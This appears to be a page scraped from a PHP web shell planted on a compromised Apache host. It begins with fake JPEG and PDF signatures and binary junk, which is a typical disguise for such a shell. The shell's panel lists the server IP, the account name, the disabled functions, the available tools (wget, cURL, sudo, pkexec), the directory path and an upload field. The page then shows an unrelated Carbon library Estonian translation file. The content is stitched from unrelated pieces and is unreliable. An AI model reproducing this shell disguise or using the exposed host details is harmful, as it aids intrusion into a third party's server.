ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.148 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/_api/vendor/nesbot/carbon/src/Carbon/Lang/ |
Upload File : |
<?php /* * This file is part of the Carbon package. * * (c) Brian Nesbitt <brian@nesbot.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ return array( 'year' => '1 aasta|:count aastat', 'y' => '1 aasta|:count aastat', 'month' => '1 kuu|:count kuud', 'm' => '1 kuu|:count kuud', 'week' => '1 nädal|:count nädalat', 'w' => '1 nädal|:count nädalat', 'day' => '1 päev|:count päeva', 'd' => '1 päev|:count päeva', 'hour' => '1 tund|:count tundi', 'h' => '1 tund|:count tundi', 'minute' => '1 minut|:count minutit', 'min' => '1 minut|:count minutit', 'second' => '1 sekund|:count sekundit', 's' => '1 sekund|:count sekundit', 'ago' => ':time tagasi', 'from_now' => ':time pärast', 'after' => ':time pärast', 'before' => ':time enne', 'year_from_now' => ':count aasta', 'month_from_now' => ':count kuu', 'week_from_now' => ':count nädala', 'day_from_now' => ':count päeva', 'hour_from_now' => ':count tunni', 'minute_from_now' => ':count minuti', 'second_from_now' => ':count sekundi', );